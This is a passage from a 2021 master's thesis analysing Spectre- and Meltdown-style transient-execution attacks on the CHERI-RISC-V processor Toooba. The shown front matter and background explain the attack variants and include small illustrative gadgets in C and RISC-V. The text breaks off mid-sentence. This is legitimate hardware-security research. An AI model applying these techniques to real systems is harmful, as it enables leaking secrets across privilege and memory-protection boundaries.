analysis of transient-execution attacks on the out-of
TRANSCRIPT
IN DEGREE PROJECT COMPUTER SCIENCE AND ENGINEERING,SECOND CYCLE, 30 CREDITS
, STOCKHOLM SWEDEN 2021
Analysis of Transient-Execution
Attacks on the out-of-order CHERI-
RISC-V Microprocessor Toooba
FRANZ ANTON FUCHS
KTH ROYAL INSTITUTE OF TECHNOLOGY
SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE
Analysis of
Transient-Execution Attacks
on the out-of-order
CHERI-RISC-V
Microprocessor Toooba
FRANZ ANTON FUCHS
Master in Computer Science
Date: January 27, 2021
Supervisor: Roberto Guanciale
Examiner: Mads Dam
School of Electrical Engineering and Computer Science
Host Organisation: University of Cambridge Department of
Computer Science and Technology
Swedish title: Analys av transient-execution attacker på
out-of-order CHERI-RISC-V mikroprocessorn Toooba
ii
Analysis of Transient-Execution Attacks on the out-of-order CHERI-RISC-V
Microprocessor Toooba
Copyright © 2021 by Franz Anton Fuchs
All rights reserved. No part of this work may be reproduced or used in any
manner without written permission of the copyright owner except for the use
of quotations.
iii
Abstract
Transient-execution attacks have been deemed a large threat for microarchitec-
tures through research in recent years. In this work, I reproduce and develop
transient-execution attacks against RISC-V and CHERI-RISC-V microarchi-
tectures. CHERI is an instruction set architecture (ISA) security extension that
provides fine-grained memory protection and compartmentalisation. I con-
duct transient-execution experiments for this work on Toooba – a superscalar
out-of-order processor implementing CHERI-RISC-V. I present a new sub-
class of transient-execution attacks dubbed Meltdown-CF(Capability Forgery).
Furthermore, I reproduced all four major Spectre-style attacks and important
Meltdown-style attacks. This work analyses all attacks and explains the out-
come of the respective experiments based on architectural and microarchitec-
tural decisions made by their developers. While all four Spectre-style attacks
could be successfully reproduced, the cores do not appear to be vulnerable
to prior Meltdown-style attacks. I find that Spectre-BTB and Spectre-RSB
pose a large threat to CHERI systems as well as the newly developed transient-
execution attack subclass Meltdown-CF. However, all four major Spectre-style
attacks and all attacks of the Meltdown-CF subclass violate CHERI’s security
model and therefore require security mechanisms to be put in place.
iv
Sammanfattning
Transient-execution-attacker har utgjort ett stort hot för mikroarkitekturer i
senaste årens forskning. I den här avhandlingen återskapar jag och utvecklar
transient-execution-attacker mot RISC-V och CHERI-RISC-V mikroarkitek-
turer. CHERI är en instruction set architecture (ISA) security extension som
ger finkornig memory protection och compartmentalisation. I avhandlingen
genomför jag transient-execution-experiment på Toooba – en superscalar out-
of-order processor som implementerar CHERI-RISC-V. Jag presenterar en ny
sorts transient-execution-attack som kallas Meltdown-CF(Capability Forge-
ry). Därutöver har jag återskapat de fyra stora Spectre-style-attackerna och
viktiga Meltdown-style-attacker. I avhandlingen analyserar jag dessa attac-
ker och förklarar resultaten från experimenten utifrån de arkitektoniska och
mikroarkitektoniska besluten tagna av respektive utvecklare. Medan de fyra
Spectre-style-attackerna kunde återskapas med framgång verkar inte proces-
sorkärnorna vara sårbara för tidigare Meltdown-style-attacker. Jag kom fram
till att Spectre-BTB och Spectre-RSB såväl som den nya sortens transient-
execution-attack Meltdown-CF utgör ett stort hot för CHERI-system. Däremot
bryter de fyra stora Spectre-style-attackerna och alla attacker av Meltdown-
CF-typen mot CHERI:s threat-model och kräver därmed säkerhetsmekanismer
för att verkställas.
v
Acknowledgements
I would like to thank:
• Simon W. Moore, my supervisor at Cambridge, who – even though the
circumstances were not in our favour – believed in me and gave me the
opportunity to conduct my work remotely. Furthermore, he provided
lots of feedback throughout close and regular supervision sessions.
• Jonathan Woodruff, my advisor, who spent many hours explaining vari-
ous concepts to me, was always happy to discuss my ideas, and provided
feedback and inspirations that heavily impacted my work.
• Peter Rugg, Alexandre Joannou, Jessica Clarke, Marno van der Maas,
and others who assisted me in solving a wide range of problems and
made me rethink my approaches and ideas.
• Robert N. M. Watson and the entire CHERI team who warmly welcomed
me into the team and created a helpful and encouraging atmosphere.
• Roberto Guanciale, my supervisor at KTH, who made it possible to con-
duct this thesis work within the CHERI group and supported me through
the entire process by providing important high-level feedback.
Contents
1 Introduction 1
1.1 Research Question and Scope . . . . . . . . . . . . . . . . . . . 2
1.2 Contributions . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
1.3 Figures and Permissions . . . . . . . . . . . . . . . . . . . . . . 2
1.4 Outline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
2 Background 4
2.1 Microarchitectural Background . . . . . . . . . . . . . . . . . . 4
2.1.1 RISC-V . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
2.1.2 Caches and Memory . . . . . . . . . . . . . . . . . . . 6
2.1.3 Out-of-order Execution . . . . . . . . . . . . . . . . . . 6
2.1.4 Speculative Execution . . . . . . . . . . . . . . . . . . 7
2.1.5 Memory Disambiguation . . . . . . . . . . . . . . . . . 9
2.2 Transient-Execution Attacks . . . . . . . . . . . . . . . . . . . 9
2.2.1 Spectre Attacks . . . . . . . . . . . . . . . . . . . . . . 10
2.2.2 Meltdown Attacks . . . . . . . . . . . . . . . . . . . . . 13
2.2.3 Timing Side Channels . . . . . . . . . . . . . . . . . . 15
2.3 Security Mechanisms . . . . . . . . . . . . . . . . . . . . . . . 15
2.3.1 Tagging Microarchitectural State . . . . . . . . . . . . 16
2.3.2 Special Instructions . . . . . . . . . . . . . . . . . . . . 16
2.4 CHERI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
2.4.1 CHERI Abstract Model . . . . . . . . . . . . . . . . . 17
2.4.2 CHERI-RISC-V . . . . . . . . . . . . . . . . . . . . . . 21
2.4.3 CHERI-RISC-V Hardware . . . . . . . . . . . . . . . . 22
2.4.4 CHERI Software Stack . . . . . . . . . . . . . . . . . . 22
2.4.5 CHERI Security Model . . . . . . . . . . . . . . . . . 23
2.5 Related Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24
vii
viii CONTENTS
3 Methods 26
3.1 Toooba . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
3.2 Research Methodology . . . . . . . . . . . . . . . . . . . . . . 28
3.3 Common Mechanisms . . . . . . . . . . . . . . . . . . . . . . . 29
3.3.1 Flushing Caches . . . . . . . . . . . . . . . . . . . . . . 29
3.3.2 Timing Measurements . . . . . . . . . . . . . . . . . . 30
4 RISC-V Results 32
4.1 Spectre Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . 32
4.1.1 Spectre-PHT . . . . . . . . . . . . . . . . . . . . . . . . 33
4.1.2 Spectre-PHT-Write . . . . . . . . . . . . . . . . . . . . 34
4.1.3 Spectre-BTB . . . . . . . . . . . . . . . . . . . . . . . . 34
4.1.4 Spectre-RSB . . . . . . . . . . . . . . . . . . . . . . . . 34
4.1.5 Spectre-STL . . . . . . . . . . . . . . . . . . . . . . . . 35
4.2 Meltdown Attacks . . . . . . . . . . . . . . . . . . . . . . . . . 36
4.2.1 Meltdown-US . . . . . . . . . . . . . . . . . . . . . . . 36
4.2.2 Meltdown-GP . . . . . . . . . . . . . . . . . . . . . . . 37
5 CHERI-RISC-V Results 38
5.1 Spectre Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . 38
5.1.1 Spectre-PHT . . . . . . . . . . . . . . . . . . . . . . . . 38
5.1.2 Spectre-PHT-CHERI-Write . . . . . . . . . . . . . . . 41
5.1.3 Spectre-BTB on CHERI-Sandboxes . . . . . . . . . . 41
5.1.4 Priv-Mode Attacks . . . . . . . . . . . . . . . . . . . . 45
5.1.5 Spectre-RSB . . . . . . . . . . . . . . . . . . . . . . . . 46
5.1.6 Spectre-STL . . . . . . . . . . . . . . . . . . . . . . . . 48
5.2 Meltdown Attacks . . . . . . . . . . . . . . . . . . . . . . . . . 49
5.2.1 Meltdown-US-CHERI . . . . . . . . . . . . . . . . . . 49
5.2.2 Meltdown-GP-CHERI . . . . . . . . . . . . . . . . . . 50
5.2.3 Meltdown-CF . . . . . . . . . . . . . . . . . . . . . . . 51
6 Discussion 58
6.1 SinglePCC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58
6.1.1 Mechanism . . . . . . . . . . . . . . . . . . . . . . . . 58
6.1.2 Testing SinglePCC . . . . . . . . . . . . . . . . . . . . 59
6.1.3 Hardening SinglePCC . . . . . . . . . . . . . . . . . . 60
6.1.4 Spectre-BTB in Kernel Code . . . . . . . . . . . . . . 62
6.2 Preventing Meltdown-CF . . . . . . . . . . . . . . . . . . . . . 63
6.3 Ethics and Sustainability . . . . . . . . . . . . . . . . . . . . . 64
6.4 Future Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 64
CONTENTS ix
7 Conclusions 66
Bibliography 67
A Full C Attack 73
B Full CHERI-RISC-V Attack 78
x CONTENTS
Acronyms
ABI Application Binary Interface
ALU Arithmetic Logic Unit
ASID Address Space Identifier
ASR Access System Registers
BHT Branch History Table
BOOM Berkeley Out-of-Order Machine
BTB Branch Target Buffer
CHERI Capability Hardware Enhanced RISC Instructions
CID CHERI Compartment Identifier
CISC Complex Instruction Set Computing
CSR Control and Status Register
DDC Default Data Capability
FPGA Field Programmable Gate Array
FPU Floating Point Unit
HDL Hardware Description Language
ILP Instruction-Level Parallelism
IR Intermediate Representation
ISA Instruction-Set Architecture
LFB Line Fill Buffer
LLC Last Level Cache
LSB Least Significant Bit
LSQ Load-Store Queue
MMU Memory Management Unit
CONTENTS xi
MSB Most Significant Bit
PCC Program Counter Capability
PHT Pattern History Table
PTE Page Table Entry
RAS Return Address Stack
RIDL Rogue In-Flight Data Load
RISC Reduced Instruction Set Computing
ROB Reorder Buffer
ROP Return-Oriented Programming
RSB Return Stack Buffer
SCR Special Capability Register
STL Store-To-Load
SUM Supervisor User Memory
TLB Translation Lookaside Buffer
Chapter 1
Introduction
Memory safety in general has been one of the most difficult security problems
in the secure computing world. The heartbleed bug gives a good example
of the severity of memory safety problems and explains the need for strong
memory safety [1]. One approach to mitigate these kinds of attacks is Cyclone
– a dialect of C that aims to achieve memory safety [2]. Similar approaches
are CCured [3] that aims to enhance type-safety of C programs and Checked
C [4] that helps to guarantee spatial memory safety for C programs.
Another approach to implement memory safety is in-memory capability
systems, which enforce memory accesses through capabilities in place of in-
teger addresses. The idea of capability systems is not new, but has existed for
more than forty years, e.g., the CAP Computer [7] or Ackerman’s architecture
[8]. However, capability systems have never been commercially successful.
The CHERI project starting in 2010 revived the idea of capability systems
and had a large impact on the field. The main idea of CHERI is to effectively
ensure spatial and temporal memory safety. CHERI systems can mitigate at-
tacks targeting spatial or temporal memory safety vulnerabilities. However, in
January 2018, a new class of attacks was published called transient-execution
attacks. These kinds of attacks had a major impact on the processor industry
and pose a large threat to CHERI systems as they can circumvent the security
mechanisms in place. Transient-execution attacks have partly been evaluated
on RISC-V and not evaluated at all on CHERI-RISC-V systems. Therefore,
the question remains whether these attacks are also possible on RISC-V and
CHERI-RISC-V systems, which this thesis aims to answer.
1
2 CHAPTER 1. INTRODUCTION
1.1 Research Question and Scope
The main research question evaluated throughout the course of this thesis is:
Is the out-of-order CHERI-RISC-V processor Toooba vulnerable to transient-
execution attacks? In order to answer that question, I will attempt to repro-
duce all major transient-execution attacks in both RISC-V and CHERI-RISC-
V. This work is limited to attacks that include transiently executed instructions
revealing secrets. Attacks inferring information about the program’s state, e.g.,
BranchScope [9] without transient execution are not part of this thesis work.
Developing and implementing mitigation mechanisms is out of the scope.
However, it is part of this work to point out possibilities for mechanisms that
can be implemented. Furthermore, I consider it in scope to test whether ex-
isting mitigation mechanisms effectively mitigate transient-execution attacks.
However, it is considered out-of-scope to thoroughly test and evaluate mitiga-
tion mechanisms including a performance analysis and which advantages and
drawbacks each mechanism has.
1.2 Contributions
In this work, I make the following contributions:
• The first work to completely reproduce the major transient-execution
attacks on a RISC-V microarchitecture.
• The first-ever work to reproduce the major transient-execution attacks
on a CHERI-RISC-V microarchitecture.
• Development of the new subclass of Meltdown-CF attacks.
• Developing an extensible framework for exploring transient-execution
attacks and creating a platform to research mitigation mechanisms in
RISC-V and CHERI-RISC-V microarchitectures.
• Testing and hardening the SinglePCC implementation in Toooba.
1.3 Figures and Permissions
All figures with a citation are used with the permission of the publisher. Fig-
ures without a citation were created by myself.
CHAPTER 1. INTRODUCTION 3
1.4 Outline
In Chapter 2, I explain the background of this thesis work including modern
microarchitectures, transient-execution attacks, and the CHERI-RISC-V ar-
chitecture. In the next chapter, I present the research methods applied in the
course of this thesis. This will be followed by Chapter 4 and Chapter 5, which
give an overview of the attacks included in the framework for RISC-V and
CHERI-RISC-V microarchitectures, respectively. Chapter 6 will discuss the
results and their implications. The thesis will be concluded in Chapter 7.
Chapter 2
Background
In this chapter, I introduce the microarchitectural background of transient-
execution attacks followed by the attacks themselves. Next, I describe CHERI
systems, which will be the basis for the research done throughout the thesis
work.
2.1 Microarchitectural Background
Microarchitectures use sophisticated mechanisms in order to improve overall
performance. In industry, the focus has been on performance, but not secu-
rity. This led to the emergence of transient-execution attacks, which exploit
these mechanisms. This section describes RISC-V and the microarchitectural
mechanisms that build the basis for transient-execution attacks.
2.1.1 RISC-V
RISC-V [10] is an extensible open-source Instruction-Set Architecture (ISA)
that has received a great deal of attention in academia and is gaining traction
in industry. An ISA describes an abstract model of the computer including
the architectural state of the machine, instructions to change the state, regis-
ters, memory access, and other input/output specifications. It is important to
distinguish between the terms architecture and microarchitecture. A microar-
chitecture is an implementation of an architecture. Therefore, binary compati-
bility exists between microarchitectures that implement the same architecture.
A program causes visible changes to the architectural state, but the microar-
chitectural state is mainly invisible to the program.
4
CHAPTER 2. BACKGROUND 5
The RISC-V ISA is a Reduced Instruction Set Computing (RISC) architec-
ture, which means that it aims to have a small set of instructions where each in-
struction does only one task. In contrast, instructions on Complex Instruction
Set Computing (CISC) architectures can do several operations within a single
instruction. RISC-V has similarities to other RISC architectures, e.g., MIPS
and ARM, but it differs mainly because of its modular nature. The unprivi-
leged specification [11] containing information on the user-space instructions
describes a minimal instruction set – the base integer instruction set – that has
to be implemented on all microarchitectures and several other extensions that
can be implemented. This is the reason why RISC-V is considered a design
space.
The RISC-V specification defines in the current unprivileged specification
13 extensions [11]. Widely implemented are the standard extensions for inte-
ger multiplication and division, atomic instructions, single-precision floating-
point, double-precision floating-point, and compressed instructions. RISC-V
extensions are abbreviated with capital letters , e.g., A for the standard ex-
tension for atomic instructions. Furthermore, RISC-V defines three different
register bit widths 32, 64, and 128 bits. RISC-V microprocessors have a name
tag to specify which extensions and features of RISC-V they implement, e.g.,
RV32IACMU, where RV32 stands for RISC-V 32 bits wide and all following
capital letters identify the instruction set extensions this microprocessor im-
plements. The capital letter G is used to refer the general-purpose ISA, which
includes the integer operations, multiplication and division operations, atomic
operations, single-precision floating point operations, and double-precision
floating point extensions abbreviated as "IMAFD".
The RISC-V privileged specification [12] defines three privilege modes:
M(achine), S(upervisor), and U(ser). One additional privilege mode might
be added in the future as it is held reserved in the description. Machine
mode presents the highest privilege level and user mode the lowest privilege
level. Like with the basic integer instruction set, every RISC-V implementa-
tion needs to implement machine mode. The implementation of other modes
is an implementation choice. When supervisor mode is implemented, this is
labeled with an S in the name tag. For user mode, the letter U is added to the
name tag. In machine mode, addresses are interpreted as physical addresses.
In supervisor mode, address translation is conducted. The main information
for address translation, e.g. the Address Space Identifier (ASID), is stored in
the satp register, which is the supervisor address translation and protection
register. The privileged RISC-V architectures manual [12] specifies 32 bit, 39
bit, and 48 bit wide virtual addresses.
6 CHAPTER 2. BACKGROUND
Machine mode and supervisor mode define new registers for special pur-
poses, which are called Control and Status Registers (CSRs) in RISC-V. These
registers are used to get information about the microarchitecture, but are also
used to control the architecture, e.g., trap handling. The chapters Machine-
Level ISA and Supervisor-Level ISA of the privileged specification [12] contain
further information on exception handling and related topics.
2.1.2 Caches and Memory
DRAM access times are slow compared to the clock frequency of the proces-
sor. If a load issued by the processor had to pay the full load penalty for each
load operation, performance would be significantly decreased. This creates
the need for low-latency memory. One solution are caches that hold the most
recently accessed data. The access time to these data will be small, but ac-
cess times of other data that is not stored in caches will still be large. Modern
processors have multiple cache levels that differ in size, speed, and cost. The
Level-1(L1) cache has the fastest access time, but is also the smallest. The
cache on the highest level – also referred to as Last Level Cache (LLC) – has
the slowest access time, but can store the most data. In general: The greater the
level number, the slower the access times become, but the more data this cache
can store. Memory is stored in the form of cache lines in caches. One cache
line contains multiple adjacent memory words. Many modern processors have
inclusive caches, which means that every cache line stored in a lower level is
also present in every cache level above that. In modern processors, every core
has its own L1 cache and the LLC – the slowest and biggest cache – is shared
among all cores. The intermediate caches may be configured exclusive to a
core or shared depending on the policy of the producer. Furthermore, caches
are well suited for the principle of locality, which programs exhibit. Temporal
locality describes the situation when a program accesses memory at the same
address more than once and spatial locality is shown when the program ac-
cesses memory at addresses nearby of an address already accessed. By storing
the cache lines of the most recently accessed data, caches manage to improve
performance for programs that exhibit both temporal and spatial locality.
2.1.3 Out-of-order Execution
A microprocessor executes a program, which is defined by a sequence of in-
structions as it is written by the programmer. This order of instructions de-
fines the program’s behaviour and is called in-order or program-order. Sim-
CHAPTER 2. BACKGROUND 7
ple microprocessors execute instruction by instruction following this order.
However, modern microprocessors incorporate out-of-order execution, which
means that instructions are microarchitecturally not executed in-order. This
is used to enhance performance. The principle of out-of-order execution is
based on the fact that instructions that do not depend on each other can be ex-
ecuted in parallel and in any arbitrary order as the final result will not change.
The first algorithm for full out-of-order execution has been demonstrated by
Tomasulo [13].
The main goal of modern processors is to hide the latency of instructions
and extract Instruction-Level Parallelism (ILP), e.g., loads and stores that miss
the L1 Data cache, by executing other independent instructions in the mean-
time. This increases the overall performance of the microprocessor. Out-of-
order execution increases the divergence between the architectural and mi-
croarchitectural state. An instruction becomes visible when it changes the
architectural state. Instructions must become visible in program-order, other-
wise the new state diverges from a valid architectural state, which means that a
different program behaviour appears. An instruction retires – also called com-
mits – in the cycle when it changes the architectural state. Instruction commits
are in sequential order matching the programmer’s model presented in the ISA.
2.1.4 Speculative Execution
An important performance criterion is to keep the processor’s pipeline filled
at all times. The processor needs to fetch the correct instructions for that. The
control-flow of a program depends on multiple parameters including user in-
put. Control-flow is steered by direct and indirect branches in machine code.
A direct branch is a jump to an address that is determined by an offset of the
branch instruction. An indirect branch is a jump to a value stored in a register.
In order to fetch the correct instructions, the microprocessor would need to
know whether a branch is taken and what its jump target is, which is is not
possible though. Therefore, modern processors use branch prediction. The
processor will predict the information it needs. Following its prediction, the
processor will execute the instructions it thinks are correct. If the processor’s
prediction turns out to be right, meaning that the predicted values match the
program’s real values, the instructions can commit. Otherwise, the instruc-
tions need to be rolled back. Therefore, speculative execution is not visible on
the architectural level. If the microprocessor’s speculation is successful, this
can lead to a large performance gain. A speculative microprocessor has special
units that handle prediction. They also differ in for which kinds of branches
8 CHAPTER 2. BACKGROUND
they are responsible for prediction.
Branch Predictors
Branch prediction can be either static or dynamic. A static branch predic-
tor always makes the same decision and does not change during runtime of a
program. On the other hand, a dynamic branch predictor may change its pre-
diction as it learns at runtime. I will focus on dynamic branch prediction as
it is the most used technique in modern microprocessors. A branch predictor
mainly consists of two sub units. The Pattern History Table (PHT) stores the
history of a particular branch. Having that information, the processor predicts
whether the branch is taken or not. This can be either local or global. A lo-
cal PHT stores only the history, e.g., strongly taken for one branch, whereas
a global PHT also takes other branches and their outcomes into account. The
processor also has a Branch Target Buffer (BTB), which stores the branch tar-
get, which is the location that the control-flow will go to if the branch is taken.
A microprocessor can also implement both local and global PHTs and choose
which one to use during runtime depending on the misprediction ratio. This
is called a Tournament Predictor [14].
In most microprocessors, branch prediction covers all direct and indirect
branch instructions with the exception of call and return instructions. They
are handled in separate logic as presented in the paragraph below. However,
instances of both instructions can also be placed in the BTB, e.g., as a mitiga-
tion mechanism against attacks or because the microprocessor does not have
dedicated logic for these two instructions.
Return Stack Buffers
A Return Stack Buffer (RSB) – also called Return Address Stack – is a hard-
ware buffer for return addresses. For every call to a function the return
address is pushed to the stack. Every return instruction pops one return ad-
dress. The return address is also stored on the software stack. The main goal
addressed by a RSB is to enhance performance. Loading the return address
from the software stack can lead to stall cycles, e.g., because the branch needs
to be taken early in the pipeline and the load can only be performed later in the
pipeline. Therefore, microprocessors use a RSB to predict the return address
and keep the pipeline filled with instructions. In case that the addresses of the
RSB and the software stack match, a performance gain is achieved. Otherwise,
speculatively executed instructions need to be rolled back.
CHAPTER 2. BACKGROUND 9
sd t0, 0(a0)
ld t1, 0(a1)
Figure 2.1: The RISC-V store and load instructions are dependent if a0 and a1
are resolved to the same physical address.
2.1.5 Memory Disambiguation
When reordering instructions the microprocessor has to ensure that it does
not break any dependencies. For a store and a load operation, a true depen-
dency exists if the load returns the value from memory that was written by the
store operation preceding the load where both operations accessed the same
address. The store and load operations shown in Figure 2.1 are dependent if
a0 and a1 are resolved to the same physical address. The process of detecting
true dependencies between memory operations is called memory disambigua-
tion. However, at the point of reordering instructions the microprocessor might
not know the full addresses yet, e.g., because they are loaded from memory
and these loads have not finished yet or the register is being updated and will
be made available on a forwarding path. Therefore, the microprocessor can-
not guarantee that these instructions are independent. However, in order to
achieve high performance goals loads have to be executed as early as possi-
ble such that a possible miss penalty can be hidden. To enhance performance,
modern microprocessors use memory disambiguation with speculation as first
presented by Gallagher et al. [16]. The microprocessor assumes that the load
is not dependent on the store and executes the load and instructions dependent
on the load speculatively before the store. When the address of the store is
resolved the microprocessor checks whether there in fact is a dependency and
in case of that it re-executes the load and its dependent instructions.
2.2 Transient-Execution Attacks
Transient instructions are instructions that are erroneously executed by the
processor due to out-of-order or speculative execution but would not have ap-
peared otherwise. Transient execution is not visible on the architectural level
as all transient instructions should not have been executed, are rolled back, and
never commit to the architectural state. However, transient execution has ef-
fects on the microarchitectural state. These state changes can be read through
side channels. This is the basis of transient-execution attacks. They trick the
10 CHAPTER 2. BACKGROUND
microprocessor into executing several instructions transiently and then gain
knowledge through side channels. The most used side channel for speculative
attacks is timing. There exist other side channels like power consumption or
heat dissipation, but in this work I will only use timing side channels. The
choice to only use timing side channels is supported by all publications on
transient-execution attacks as timing side channels have proved to be effec-
tive [18, 19, 20]. Speculative Attacks can be subdivided into Spectre Attacks
and Meltdown Attacks [19]. More sophisticated classifications [20] exist, but
are not needed for this thesis work.
2.2.1 Spectre Attacks
Spectre Attacks focus on microarchitectural state changes due to misprediction
of control or data flow. Spectre attacks were first demonstrated by Kocher et
al. [22]. They can further be subdivided into four categories regarding which
part of speculative execution they seek to exploit.
Spectre-PHT
Following the name, Spectre-PHT aims to attack the Pattern History Table.
The basic attack principle is to train the history of a branch such that the pre-
diction’s outcome follows the attackers intentions. A simple example – derived
from [22] – is shown in Figure 2.2. The if statement will result in a branch
instruction. The first step of the attacker is to train the PHT of this branch
such that it is strongly predicted to not taken, which means that the condition
will evaluate to true. This can be accomplished by calling the code with this
if statement with values for the index i that are less than array_size. The
next step is to conduct the actual attack. The attacker can provide any desired
value for i as the branch prediction will speculatively execute the body of the
if statement. Therefore, the attacker can trick the microprocessor in execut-
ing an arbitrary load without checking the bounds in the first place. Using the
data retrieved from the load to sec_arr as an index to a user accessible array
usr_arr will change the microarchitectural state. Later, the microprocessor
will detect the misprediction and roll back the instructions. However, microar-
chitectural side effects have already taken place and stay visible even though
none of the speculatively executed instructions committed. Spectre-PHT is
also known as Spectre v1 and presented as such in [22].
CHAPTER 2. BACKGROUND 11
int j;
int r = 0;
if (i < array_size)
{
j = sec_arr[i];
r = usr_arr[j];
}
Figure 2.2: Spectre-PHT example written in C.
Spectre-BTB
Opposed to Spectre-PHT, Spectre-BTB attacks the Branch Target Buffer. A
BTB has only a limited number of entries. Therefore, the target address of
a branch instruction has to be mapped to an entry by a hash function. In the
original form as demonstrated by Kocher et al. [22] the small size of the BTB is
exploited by attackers. Because of the small size of the BTB, the hash function
can lead to frequent collisions. When a branch is seen by the microprocessor, it
looks up the corresponding entry in the BTB and uses this target address for the
prediction. As for Spectre-PHT, Spectre-BTB consists of two phases. First, the
attacker injects a malicious branch target into the BTB at the entry of a branch
executed by the victim program. Figure 2.3 shows two branch instructions,
which I assume to be mapped to the same BTB entry. The injection can be done
by executing the second branch instruction, which will overwrite the entry of
the first one. In the second phase, the attacker triggers the first instruction
to be executed. Speculatively, the branch target address in the BTB entry –
which is the branch target of the second branch instruction – will be used and
the control-flow will be speculatively directed there. This target is attacker
controlled and will leak the desired information. This variant is called out-of-
place Spectre-BTB.
Another variant is in-place Spectre-BTB. In this case, only one branch
instruction is used. The attacker manages, e.g. by user input, to poison the
BTB entry of this branch instruction. The next time, the code with this branch
instruction is executed, the branch prediction will direct the control-flow spec-
ulatively to attacker intended code, which the attacker can use to leak informa-
tion. Spectre-BTB is also known as Spectre v2 and presented as such in [22].
12 CHAPTER 2. BACKGROUND
00000008: 00060067 jr a2
...
00001008: 00078067 jr a5
Figure 2.3: Indirect jumps mapped to the same BTB entry.
Spectre-RSB
Spectre-RSB attacks were discovered later than the original Spectre attacks
and aim to attack speculative execution involving the Return Stack Buffer [23,
24]. There exist multiple attacks flavours of this attack that use subtleties of a
particular microarchitecture, but all have the same goal in common. Spectre-
RSB attacks target a mismatch between the address on the hardware return
stack and the address on the software return stack. The microprocessor will
use the address in the RSB and speculatively direct the control-flow there. The
attack consists of the injection phase, which changes the entry at the current
index of the RSB and the side channel sending phase. This triggers side effects
by speculatively returning to the injected address.
Spectre-STL
Spectre- Store-To-Load (STL) differs substantially from the other Spectre at-
tacks as it does not attack control-flow, but data flow. As described in Section
2.1.3, the microprocessor wants to execute load instruction as early as possible
to hide the load penalty. A load instruction can pass a store instruction if they
are independent. Load and store instructions are independent if their mem-
ory addresses differ. However, memory addresses might not be fully available
to the microprocessor when it needs to make the decision whether the load
is allowed to pass. Therefore, the microprocessor speculates whether the ad-
dresses are independent. Sophisticated processors have dedicated memory dis-
ambiguation logic for this purpose as described in Section 2.1.5. An example
of the attack is shown in Figure 2.4. The first step is to trick the microproces-
sor into predicting that addr1 and addr2 are different. Then the load from
addr2 will speculatively be executed before the store to addr1. In the ex-
ample, the memory is overwritten with zeros at this address. The attacker can
manage to speculatively read out the stale data before it is overwritten. This
attack has also the name Spectre v4 and was demonstrated first by Horn [25].
CHAPTER 2. BACKGROUND 13
*addr1 = 0x00;
val = *addr2;
Figure 2.4: Spectre-STL example in C.
Rogue In-Flight Data Load
Rogue In-Flight Data Load (RIDL) [26] is an attack of microprocessors that
use Line Fill Buffers (LFBs). A LFB is used in microprocessors in order to
prevent caches from blocking when a miss occurs. In order to achieve high
performance goals, microprocessors speculatively use in flight store data for
loads without checking permissions in the first step. A store is in flight, when
it is currently in the LFB, but not has not committed yet, e.g., due to a cache
miss. Another process running on the same hardware thread can observe this
in-flight store by performing a random load and leak its value through a side
channel. The general attack idea is as follows: A victim process performs a
memory access to secret data. This memory access will be handled via LFBs
and an entry holding the secret data will be allocated. Next, an attacker per-
forms a memory access, which will be speculatively satisfied by an LFB entry.
This returns the secret data to the attacker who uses it as an index to a buffer.
This will load a line into the caches and therefore reveals the secret value to
the attacker. Eventually, the processor will roll back the execution because of
misspeculation, but the effects to the cache will remain. With this attack, one
can leak entire pages from another running process.
2.2.2 Meltdown Attacks
Meltdown attacks focus on microarchitectural state changes due to transient
execution of instructions following a faulting instruction. Therefore, Melt-
down attacks do not attack branch prediction features of the microprocessor,
but out-of-order execution. They also rely on at which point access rights are
checked and hardware exceptions are thrown.
Meltdown-US
The original Meltdown attack – demonstrated by Lipp et al. [27] – seeks to
access a page for supervisor use only from user space. Therefore, this attack
is also called Meltdown-US – User/Supervisor. The goal of the attack is to
read out supervisor-only memory without having sufficient privilege level for
that. The attack exploits that the protection domain privilege is not checked
14 CHAPTER 2. BACKGROUND
when actually accessing the page, but in later pipeline stages. Eventually this
instruction will fault and raise a hardware exception, but in the meantime tran-
siently executed instructions following the faulting instruction will reveal the
sought value through side channels. By conducting this attack multiple times,
an attacker can read out the entire kernel of an operating system [27].
Foreshadow Attacks
Van Bulck et al. presented Foreshadow [28], which has the same goal as
Meltdown-US – reading out data without having permission to do so. How-
ever, Foreshadow is targeting Intel SGX enclaves [29] and exploits a different
mechanism than Meltdown. Foreshadow is tailored to microprocessors that
do not allow large speculation windows and where the data to be leaked must
reside in the L1 cache. However, it is possible to access the L1 cache specula-
tively even though access is denied. This is caused by the fact that data access
and permission control is conducted in parallel in an exploitable microproces-
sor [30]. Therefore, even though access is denied the value is fetched into a
register and can be leaked through a side channel. Later, Weisse et al. [31]
presented Foreshadow-NG, which is an extension of Foreshadow that allows
to break operating system or hypervisor virtual memory abstraction.
Meltdown-GP
The GP – General Protection – variant of Meltdown enables an attacker to
access privileged system registers. When accessing a system register, the mi-
croprocessor will check whether the current privilege is sufficient to access it.
If this is not the case, an exception will be thrown. Meltdown-GP exploits that
some microarchitectures throw the exception late or allow computation on the
system register value before stopping executing the instruction sequence. This
allows the attacker to leak the the system register’s value due to a side channel.
This attack has erroneously been named as Spectre v3a in early documents [32,
33].
Meltdown-RW
Meltdown-US demonstrated that supervisor memory can be read out without
sufficient privilege level. Kiriansky and Waldspurger [34] introduced a new
attack initially called Spectre v1.2. This attack seeks to write to pages that are
marked as read-only. The functioning of this attack is similar to Meltdown-
US. The attacker writes to the read-only page and other transient instructions
CHAPTER 2. BACKGROUND 15
follow until the exception is thrown by the processor. The difference is that the
transient executions are in another process. The speculative write of one pro-
cess will trick another process to leak secret information. Following Canella
et al. [19], this attack uses a transient-execution sequence after a faulting in-
struction. Therefore, it is referred to as Meltdown-RW – Read/Write.
2.2.3 Timing Side Channels
Measuring how long a certain instruction sequence needs to execute is a well-
known and often used side channel. The attacker measures the execution time
and compares it to a reference time. Based on that, the attacker decides which
information has been gained. Any sequence of instructions can be used for
timing measurements in theory, but in practice only instruction sequences that
generate measurement results such that the execution times of different runs
deviate significantly are used. Often the access time of load operations is
taken. A load will commit earlier in time if it hits a cache and therefore de-
